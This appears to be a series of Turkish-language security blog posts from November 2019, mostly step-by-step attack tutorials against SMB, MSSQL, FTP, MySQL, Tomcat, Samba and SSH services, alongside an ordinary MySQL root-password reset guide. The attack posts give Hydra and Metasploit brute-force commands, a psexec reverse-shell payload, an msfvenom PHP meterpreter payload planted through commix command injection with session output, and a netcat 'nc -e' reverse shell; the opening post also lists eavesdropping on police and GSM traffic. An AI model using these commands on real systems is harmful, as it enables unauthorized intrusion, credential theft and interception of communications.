26 Kasım 2019 Salı

Sinyal İstihbaratı Ve SigintOS


Sinyal İstihbaratı Ve Önemi Nedir?

Günümüzde teknolojinin bu denli gelişmesi ve son zamanlarda üretilen cihazların uzaktan kontrol sistemlerinin olması sinyal istihbaratına olan ilgiyi arttırmıştır.Genelde Radyo Dalgaları kullanılarak sinyal istihbaratı sağlanır. RF Hacking için birçok cihaz kullanılmaktadır.Bu cihazların kullanımına önümüzdeki makalelerde değineceğiz.
RF Hacking ile yapılabilecek bazı şeyler şunlardır:
*Şifrelenmemiş Polis/ Ambulans / İtfaiye / Askeriye gibi telsiz konuşmalarını dinlemek
*Uçak-kule ve diğer konuşmaları dinlemek
*Radar kullanan uçak ve gemi gibi taşıtların konumlarını öğrenmek
*GSM görüşmeleri ve SMS’leri takip etmek
*kablosuz telefonları dinlemek
*Amatör telsiz konuşmalarını dinlemek
*FM radyo ve televizyon yayınlarını takip etmek
*Uyduları ve ISS’yi dinlemek
*Droneların yerlerini tespit etmek
Ve Benzeri işlemler gerçekleştirilebilir..
Bu işlemleri Linux,Parrot OS gibi işletim sistemlerinden gerekli toolları gerçekleştirebileceğimiz gibi bu iş için özel olarak üretilen ve bir linux dağıtımı olan SigintOS’u da kullanabiliriz.

SigintOS Nedir?

SigintOS, Sinyal istihbaratı için özel olarak geliştirilmiş bir linux dağıtımıdır.Kendisine ait SigintOS Tool adındaki toolu ile birçok işlemi tek tool içerisinde toplamıştır.Bu dağıtımda WireShark,GQRX,GNU RADİO ve birçok sinyal istihbaratında kullanılan tool yüklü olarak gelmiştir.Dolayısıyla sinyal istihbaratıyla uğraşanların yükü azalmıştır.RTL-SDR,HackRF ve BladeRF Gibi cihazların sistemleri kurulu olarak gelmiş ve kullanıcılarına vakitten tasarruf sağlamıştır. Bu dağıtımı VirtualBox üzerinden live olarak çalıştırabiliriz.

SMB(microsoft-ds) SALDIRILARI

SMB servisi 445.port üzerinde çalışan TCP bazlı bir servistir.Bugün anlatacağımız saldırı yöntemi bu servis üzerine brute force yapılmasıdır.Önümüzdeki makalelerde bu servise yönelik daha üst düzey saldırıları anlatacağız.
Brute force saldırısını msfconsole üzerinden auxilary ile gerçekleştireceğiz.
use auxilary/scanner/smb/smb_login yazarak auxilarye geçiş yapıyoruz.
show options diyerek auxilary’nin bizden ne istediğini görüyoruz ve set komutu ile dolduruyoruz. Sistemde bildiğimiz bir SMBUSER yoksa Administrator olarak saldırımızı gerçekleştirebiliriz.
set pass_file “wordlist yolu”
set STOP_ON_SUCCESS true yazarak doğru loginleri bulduğunda saldırının durmasını sağlıyoruz.
run diyerek saldırıyı başlatıyoruz.
Saldırının başarılı gerçekleştiğini varsayarak devam ediyoruz.”winexe aracını kullanarak bu servise bağlantı sağlayabiliriz.
winexe –user=Administrator%şifre //hedef sistem ip adresi ‘erişmek istediğimiz komut satırı(cmd)’
Bu şekilde hedef sisteme bağlantı sağlayabiliriz.Aynı işlemi msfconsole üzerinden de gerçekleştirebiliriz.
use exploit/windows/smb/psexec
show options diyerek istenenleri dolduruyoruz (set komutu ile)
set payload payload windows/shell/reverse_tcp yazarak sisteme payload atıyoruz.
show options diyerek payloadın bizden istediklerini dolduruyoruz.
run diyerek işlemi başlatıyoruz ve komut satırına erişim sağlıyoruz.
Eğer sistemde oturum açılmaz ise bunun nedeni payloadın mimarisinden kaynaklanıyor olabilir. x32 veyahut x64 payload bir payload vererek aynı işlemleri gerçekleştirip devam edebilirsiniz.

SMB Sign Özelliğinden Faydalanmak:

SMB_SİGN özelliği mesaj bloklarında görülen bir imza özelliğidir.Özelliğin sistem yöneticisi tarafından açılmaması durumunda çeşitli yönlendirmelerle hedef sistemde Man İn The Middle(Ortadaki Adam) gerçekleştirilebilir.
Sistemde bu özelliğin aktif olup olmadığını “Runfinger” adlı tool ile öğrenebiliriz.
usr/share/responder/tools/Runfinger.py -i hedef ip adresi
Bu toolun çalışma mantığı şöyledir:
Bir ip adresi verilir ve bu tool sistemde çalışan tüm cihazların SİGN özelliğini kontrol eder.Cihazların SİGN özelliği FALSE ise yapacağımız saldırı olumlu sonuç verecektir.Bu saldırıyı önümüzdeki makalelerde detaylı şekilde anlatacağız.

MSSQL SALDIRILARI



MSSQL’in kullanım amacı MySQL ie aynıdır yani amacı databaseleri yönetmektir.1433.Portta çalışan TCP bazlı bir servistir.MSSQL’İn MySQL ‘den farkı komut yürütülebilir olmasıdır.İLk önce MSSQL üzerine bir kabakuvvet saldırısı gerçekleştireceğiz.Bu işlemi msfconsole üzerinden bir auxilary ile gerçekleştireceğiz.
use auxilary/scanner/msslq/mssql_login
show options diyerek bizden istenen yerleri set komutu ile dolduruyoruz.MSSQL’de yeterli user “sa” dır.Gerekli yerleri doldurduktan sonra
set STOP_ON_SUCCESS true diyerek doğru sonucu bulduğunda durmasını istiyoruz.Daha sonra “run” diyerek başlatıyoruz.Doğru sonunu bulduğumuzu varsayarak devam ediyoruz.
Komut yürütmek için yine msfconsole üzerindeki bir auxilary kullanacağız.
use auxilary/admin/mssql/mssql_exec
show options diyerek bizden istenen yerleri dolduruyoruz.
run diyoruz ve başlatıyoruz.İlgili sistemde
set cmd “komut”
ile komut yürütüyoruz.
Aynı zamanda sistemde bir netcat bağlantısı sağlayıp shell satırına inebiliriz.Bu işlem için msfconsole üzerindeki bir exploiti kullanacağız.
use exploit/windows/mssql/mssql_payload
show options diyerek bizden istediklerini set komutu ile dolduruyoruz. (SRVHOST’un İP’si dosya yükleyeceğimiz yerin İP’si olacak.Eğer LOCALHOST’da çalışıyorsanız[laboratuvar gibi] kendi İP adresimizi yazıyoruz.
run diyerek exploiti çalıştırıyoruz.Komut satırına inmiş bulunmaktayız.Bir başka yazımızda görüşmek üzere

20 Kasım 2019 Çarşamba

Sunucuya (metasploit) PHP meterpreter shell Atma

Adım 1: Meterpreter ile PHP shell oluşturmak ;


Kod:
msfvenom -p php/meterpreter/reverse_tcp LHOST=İP_ADRESİNİZ  LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php

Adım 2: msfconsole ile Multi Handleri Başlatıyoruz ;

Kod:
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.178.3:4444
[*] Starting the payload handler...

3. Adım: Hedefin "/ var / www /" dizinindeki "msfvenom.php" dosyasını oluşturmak ve uygulamak için commix-i kullanın.
Kod:
https://github.com/commixproject/commix

Kod:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"

SHELL ATILMIŞTIR !

Kod:
[*] Sending stage (40499 bytes) to 192.168.178.4
[*] Meterpreter session 1 opened (192.168.178.3:4444 -> 192.168.178.4:50450) at 2015-05-16 03:11:42 -0400

meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 3.16.0-4-586 #1 Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) i686
Meterpreter : php/php
meterpreter >

18 Kasım 2019 Pazartesi

– Hping3 –

Temel Olarak Hping ile Raw ip, ICMP , TCP ve UDP paketleri üretilebilir. Üretilecek paketlere ait tüm özellikler komut satırından belirlenebilir.
SYN —> ( hping -S )
FIN —-> ( hping -F )
RST —-> ( hping -R)
ACK —-> ( hping -A)
PUSH —> ( hping -P)
URG —-> ( hping -U)
Kullanımı : hping -S -c 100 -p 80 hedefsite.com
-c : Bu parametre ile kaç adet bayrak gönderileceğini belirleyebiliriz.
-p : Bu parameter ile hangi porta gönderileceğini belirleyebiliriz.
-a : Sahte IP adresi vererek IP adresinizi gizlememizi sağlayan parametredir.

– ARP Poisoning ( ARP Zehirlenmesi ) –

ARP ( Address Resolution Protocol ) zehirlenmesi OSI katman modelinde network katmanında yer alır. Bu katmanda yer alan ARP, IP adreslerini MAC adreslerine çevirir. Bu IP adreslerine Karşılık Gelen MAC adreslerini ARP tablolarında tutar ve ARP tabloları da belirli aralıklarla güncellenir. Bir ip adresine karşılık , sahte bir MAC oluşturmasını ARP zehirlenmesi denir.
ARP Poisoning Saldırısı İçin Kullanılabilecek Araçlar:
– Arp Tool 1.0.2
– Etherial ya da Wireshark
– Arpison
– Ettercap
– Cain & Abel

EXPLOİTATİON(METASPLOİT)

Metasploit,hemen hemen her Pentest’de (Penetration Testniing) kullanılan Pentesterlerin vazgeçilmez aracıdır.İçerisinde birçok exploit,auxilary ve payload modulleri bulunur.
Metasploit aracımızı daha hızlı kullanmamız için bazı konfigürasyon ayarlarını yapmamız lazım.Metasploitimizin daha hızlı çalışabilmesi için onu bir veritabanına bağlamamız gerekir.Terminali açarak şu komutları yazıyoruz:
service postgresql start => postgresql servisini çalıştırdık.
msfdb imit => Msfconsole’yi veritabanına bağladık.
Bu şekilde daha hızlı arama yapabilmesini sağlamış olduk.
-h komutu ile komutlar hakkında bilgi sahibi olabiliriz.
Şimdi Metasploit İle Bir Exploitleme İşlemi Nasıl Yapılır Onu Öğreneceğiz:
İlgili servisin versiyon bilgisini bulduktan sonra uygun bir exploit aramak için şu komutu giriyoruz:
search “Versiyon Bilgisi” type:exploit (Auxilary aramak istiyorsak Auxilary gibi)
Tabiiki bu versiyona uygun exploiti aramak için sadece msfconsole’yi kullanmayız.Google üzerinden (exploit-db,rapid7,cxsecurity,0daytoday.com,Vb..) veyahut terminal üzerinden de exploit aramamızı gerçekleştirebiliriz.Terminal üzerinden bu aramayı gerçekleştirmek için “Searchsploit” i kullanabiliriz.
searchsploit “Versiyon Bilgisi” => Bu şekilde arama yapabiliriz.
Eğer bu exploiti Bilgisayarımıza indirmek istiyorsak şu komutu kullanırız:
searchsploit -m exploit numarası => Bu şekilde Exploiti bilgisayarımıza indirebiliriz.
Şimdi uygun exploiti bulduğumuzu varsayarak devam edelim.
use exploit => bu komut ile exploitimize geçmiş oluyoruz.
show options => Exploitin bizden hangi bilgileri istediğine bakarız.YES yazan yerleri girmek zorundayız.(rhost Vb. gibi)Bunu Set komutu ile gireriz.Yani Şöyle:
set ‘hedef ip’ => rhost u gireriz.
Exploitin bizden istediklerinide gerçekleştirdikten sonra exploit/run komutu ile exploiti çalıştırabiliriz.Eğer exploit başarılı ise msfconsolede açılacaktır.

– NETCAT (NC) –




Netcat , TCP/IP üzerinden veri gönderme veya almaya yarayan bir araçtır. Netcat aracı ile herhangi bir portu dinleyebilir, port tarama, bağlantı oluşturma, shell oturumu, dosya transferi gibi pek çok şey yapılabilir.
Örnek Komutlar:
nc -v hedefsite.com 80
nc -vz hedefsite.com 80
nc -v -n IP_ADRESI -z 1-1024
nc -lvp PORT

8 Kasım 2019 Cuma

MySQL, MariaDB Root Şifresinin Sıfırlanması




MySQL / MariaDB root şifrenizi unuttuysanız bu doküman size şifrenizi kurtarmanıza yardımcı olacaktır. Birçok kullanıcının başına gelebilecek olan bu durum basitçe anlatılmıştır.

Gereksinimler

MySQL veya MariaDB’ nin üzerinde çalıştığı Linux sunucunuza sudo yetkili hesabınızla giriş yapmalısınız.

Veritabanı Sürümü Kontrolü

Aşağıdaki komut bize veritabanımızın sürümü hakkında bilgi verecektir.
$ mysql --version
MySQL veritabanı çalışıyorsa sunucunuzda aşağıdakine benzer bir çıktı ile karşılaşacaksınız.
mysql Ver 14.14 Distrib 5.5.53, for debian-linux-gnu (x86_64) using readline 6.3
MariaDB veritabanı çalışıyorsa sunucunuzda aşağıdakine benzer bir çıktı ile karşılaşacaksınız.
mysql Ver 15.1 Distrib 5.5.52-MariaDB, for Linux (x86_64) using readline 5.1
Şimdi burada hangi veritabanı türü ve sürümünü kullandığımızı not etmemiz gerek. Dokümanın ilerleyen kısımlarında bu bilgiler işimize yarayacak.

Veritabanının Durdurulması

Root şifresini değiştirmeden ömce çalışan veritabanını durdurmamız gerekmketedir.
Aşağıdaki komut ile MySQL veritabanınızı durdurabilirsiniz.
$ sudo systemctl stop mysql
Aşağıdaki komut ile MariaDB veritabanınızı durdurabilirsiniz.
$ sudo systemctl stop mariadb

İzin Kontrolü Olmadan Veritabanının Başlatılması

Eğer MySQL veya MariaDB veritabanlarınızı kullanıcı ayrıcalıkları olmadan çalıştırırsanız şifresiz olarak veritabanı komut satırına erişim sağlayabilirsiniz.
Bunu yapabilmek için kullanıcı ayrıcalıkları bilgilerini tutan grant tables’ ı ve başka kullanıcıların erişimini önleyen networking’ i durdumanız gerekmektedir.
Veritabanını hem grant tables’ ı yüklemeden hem de networking’ i başlatmadan aşağıdaki komut ile çalıştırmalıyız.
$ sudo mysqld_safe --skip-grant-tables --skip-networking &
Buradaki ampersand(&) karakterini kullanmamızın sebebi ilgili işlemi arka plana göndermek içindir, bu şekilde ilgili işlem arka plan da çalışmaya devam ederken biz de sunucu üzerinde işlemlerimize devam edebiliriz.
Şimdi veritabanımızı root kullanıcısı ile açıyoruz. Şu anda bizden şifre istememesi gerekmektedir.
$ mysql -u root
MySQL çalışan sunucumuzda aşağıdaki gibi bir çıktı ile karşılaşacaksınız.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
MariaDB çalışan sunucumuzda aşağıdaki gibi bir çıktı ile karşılaşacaksınız.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

Root Şifresinin Değiştirilmesi

ALTER USER komutu ile MySQL veritabanı root şifresini değiştirebiliriz. Ancak öncesinde çalışmasını engellediğimiz grant tables’ ın tekrardan yüklenmesini sağlamamız gerekmektedir.
Aşağıdaki komut ile veritabanı yetkilendirmelerinin tekrardan okunarak, güncel olmasını sağlamalısınız.
mysql> FLUSH PRIVILEGES;
MySQL 5.7.6 / MariaDB 10.1.20 ve daha yeni sürümler için aşağıdaki şekilde root şifresini değiştirebiliriz.
 mysql> ALTER USER 'root'@'localhost' IDENTIFIED BY 'Yeni_rootSifreniz';
MySQL 5.7.5 / MariaDB 10.1.20 ve daha eski sürümleri için aşağıdaki şekilde root şifresini değiştirebiliriz.
 mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('Yeni_rootSifreniz');
Aşağıdaki gibi bir çıktı ile karşılaşacaksınız.
Query OK, 0 rows affected (0.00 sec)
Eğer ALTER USER komutu işe yaramadıysa aşağıdaki UPDATE … SET komutları ile root şifrenizi sıfırlamayı deneyebilirsiniz.
mysql> UPDATE mysql.user SET authentication_string = PASSWORD('Yeni_rootSifreniz') WHERE User = 'root' AND Host = 'localhost';
Bu işlem sonrasında grant tables’ ı tekrar aktif etmeyi unutmayınız. Bu işlem için aşağıdaki komut ile veritabanı yetkilendirmelerinin tekrardan okunarak, güncel olmasını sağlamalısınız.
mysql> FLUSH PRIVILEGES;

Veritabanının Tekrardan Normal Şekilde Başlatılması

Tüm aşamaları başarılı şekilde yapıp root şifresini sıfırladıktan sonra artık veritabanımızı normal şekilde çalıştırıp, root kullanıcısı ile erişim sağlayabilirsiniz.
MySQL işleminin sonlanması için aşağıdaki komut yardımcı olacaktır.
$ sudo kill `cat /var/run/mysqld/mysqld.pid`
MariaDB işleminin sonlanması için aşağıdaki komut yardımcı olacaktır.
$ sudo kill `/var/run/mariadb/mariadb.pid`
Şimdi MySQL veya MariaDB veritabanı çalışan sunucumuzda ilgili servisleri tekrar çalıştıralım.
MySQL veritabanı için aşağıdaki komut yardımcı olacaktr.
$ sudo systemctl start mysql
MariaDB veritabanı için aşağıdaki komut yardımcı olacaktr.
$ sudo systemctl start mariadb
Şimdi yeni verdiğimiz root şifresi ile giriş yapabiliriz.
$ mysql -u root -p
Bu komut sonrası yeni atadığınız şifre ile başarılı şekilde veritabanınıza giriş yapabilirsiniz.

7 Kasım 2019 Perşembe

21.PORT(FTP) SALDIRILARI



FTP(File Transfer Protocol) 21.port üzerinde çalışan TCP bazlı bir servistir. Website dosyalarını sunucuya atmak için kullanılır.Saldırgan bu protokole erişim sağladıktan sonra Önemli Dosyaları Çalabilir veya Uzaktan Kod Yürütebilir.
Çoklu proje geliştiren firmalarda ftp girişi genelde “anonymous”dur.Yani user=anonymous , password=xxx@hotmail.com(random bir e-postadır) olarak girilebilir.Servise bağlandıktan sonra temel linux komutları geçerlidir.Örneğin sistemde gerekli yetki mevcut ise “get x” komutu ile sistemdeki x dosyasını çekebiliriz.
Eğer FTP girişi anonymous değilse Kali Linux’da yüklü olarak gelen “Hydra” adlı tool ile Brute Force Yapabiliriz.Bunu terminali açarak şu şekilde yapıyoruz:
hydra -l ‘kullanıcı adı’ -P ‘Kullanılacak Şifre Wordlistinin Yolu’ ‘hedef ip adresi’ ftp -vV
Komutu ile Brute Force yapabiliriz.Brute Force doğru giriş bilgilerini bulduğu zaman yeşil bir şekilde ekrana yansıtacaktır.
Bu servise pentest yapmanın bir başka yolu ise Servisin versiyonuna uygun public edilmiş bir exploiti kullanarak sızmaktır.Bu işlemi bir sonraki yazımızda detaylı bir biçimde ele alacağız.

MySQL SALDIRILARI



MySQL 3306 numaralı port üzerinde çalışan TCP bazlı bir servistir.Diğer servislerin aksine MySQL’de mutlaka root adında bir kullanıcı vardır.Bu servis üzerine kaba kuvvet saldırıları(Brute Force) yapılırken user olarak root kullanılır.
MySQL üzerine Kali Linux’da yüklü olarak gelen “Hydra” adlı tool ile kaba kuvvet saldırıları gerçekleştirilir.Bunun için terminali açarak şu komutu gireriz:
hydra -l root(kullanıcı adı) -P ”şifre için kullanılacak wordlist’in yolu” mysql://ip adresi
komutu ile MySQL servisi üzerine kaba kuvvet saldırıları yapılabilir.Hydra doğru giriş bilgilerini bulduktan sonra ekranda yeşil bir yazıyla gösterecektir.
Bu servis üzerine girişler bazen parolasız olabilir.Bu girişler sadece kullanıcı adıyla yapılır yani root ile giriş yapılır.Bunun sebebi firmanın parolasız girişi EVET olarak bırakmasıdır.Ve servise şöyle bağlanılır:
mysql -u root -p -h “hedef ip adresi”
Bu servise bağlandıktan sonra kullanılacak bazı komutlar aşağıdaki gibidir:
Örnek bir MySQL üzerinden gidelim.Veri tabanımızın adı x olsun.Tablomuzun adı y olsun ve tablomuzun içinde users_users adında bir dosya olsun.Bu dosyanın içerisinde de e-mail,login,password adında veriler olsun.
show databases => Veri Tabanlarını Görüntüleriz
use x => x Veri Tabanının İçindeki Tabloları Gösterir.
describes y => y Tablosunun İçindekileri Gösterir.
select e-mail,login,password from users_users; =>e-mail,login ve password Bilgilerini Seçeriz.
MySQL’de yeterli yetkimiz var ise sistemin Geri Yükleme(Backup) dosyalarını alabiliriz.Bunun İçin “mysqldump” aracını kullanırız.
Bunun için örnek bir sistem oluşturalım.Sistemimizin adı “BUG” olsun.Bu sistemin Backup dosyasını almak için aşağıdaki komutu kullanıyoruz:
mysqldump -h “hedef ip adresi” -u root -p “Parola” bug > bug_backup.txt
Böylece bug adındaki sistemin backup dosyalarını bilgisayarımıza alıyoruz.
MySQL servisi üzerine yapılabilecek saldırılar bunlard

TOMCAT SALDIRILARI



Tomcat 8080/8180 portunda çalışan TCP bazlı bir servisdir.Tomcat saldırıları genelde küçük wordlistlerle gerçekleştirilir.Çünkü Tomcat servisi 15-20 giriş denemesinden sonra kendini 3-5 dakika arası kitler.Bu yüzden Tomcat servisine manuel kaba kuvvet saldırısı yapmak en mantıklısıdır.
Tomcat servisine tarayıcı üzerinden erişilir.Herhangi bir yol ile Tomcat giriş bilgilerine eriştiğimiz bir sisteme .jsp uzantılı dosyalar yüklenebilir.Bu dosyalar ile uzaktan kod yürütme işlemi gerçekleştirilebilir.Bu dosyalara Github’dan rahatlıkla erişim sağlayabilirsiniz.
Bir örnek vermek gerekirse Uzaktan Kod Yürütme ile kendimize bir Netcat Shell bağlantısı alabiliriz.
Örnek Komutlar Aşağıdaki Gibidir:
Kali Linux’da terminali açıp şu komutu gireriz:
nc -l -v -p 4444
Uzaktaki komut satırımıza da şu komutu veriyoruz:
nc -e bin/bash “ip adresi” 4444
Ve böylelikle hedefin komut satırında istediğimiz komutları çalıştırabiliriz.

SAMBA,SSH VE TELNET SALDIRILARI

 

 

SAMBA SALDIRILARI:

Samba,445 numaralı portta çalışan TCP bazlı bir servistir.Kullanım amacı genelde domain kurmak,dosya paylaşımını yönetmek,sistem yönetmektir.
Microsoft sistemlerde kullanımı daha sık görülür.Linux sistemlerde genelde tercih edilmez.Nadir olarak kullanılırlar.
Bu sistemlerde “Anonymous Login” tarzı bir login mevcut olabilir.
Samba’ya şöyle giriş yapılır:
rpcclient -U** “ip adresi” ile giriş yapılır.
Samba’ya erişim sağlandıktan sonra “enum4linux” toolu kullanılarak erişilebilecek bütün bilgilere erişim sağlanır.
Örneğin bir dizine şöyle erişilir:
smbclient //ip adresi /tmp => dizine erişir.
Ayrıca exploit-db ve birçok exploit sitesinde samba üzerine yazılmış exploitler mevcuttur.

SSH SALDIRILARI:

SSH,22 numaralı port üzerinde çalışan TCP bazlı bir servistir.SSH servisinin amacı uzaktan yönetimdir.Bu porta Pentest işlemi sadece kaba kuvvet(Brute Force) saldırısı ile yapılabilir.
Kaba kuvvet saldırılarında “Hydra” adlı tool kullanılır.
Hydra’yı bu saldırıda şöyle kullanırız:
hydra -l “kullanıcı adı” -P “Password için kullanıcalak wordlistin yolu” ssh://”İp Adresi”
Hydra bu komutla birlikte Brute Force’yi başlatır.Doğru giriş bilgilerini bulduktan sonra ekranda yeşil bir yazı ile gösterecektir.Kullanıcı bilgilerini öğrendikten sonra şöyle bağlanıyoruz:
ssh “kullanıcı adı” “İp adresi”

TELNET SALDIRILARI:

Telnet,23. portta çalışan bir servisdir.Kullanım amacı SSH İle aynıdır.Yani uzaktan yönetimdir.Fakat SSH servisine göre daha güvensizdir.
Genel saldırı mantığı brute forceye dayanır.Çoğunlukla varsayılan parolalar kullanılır.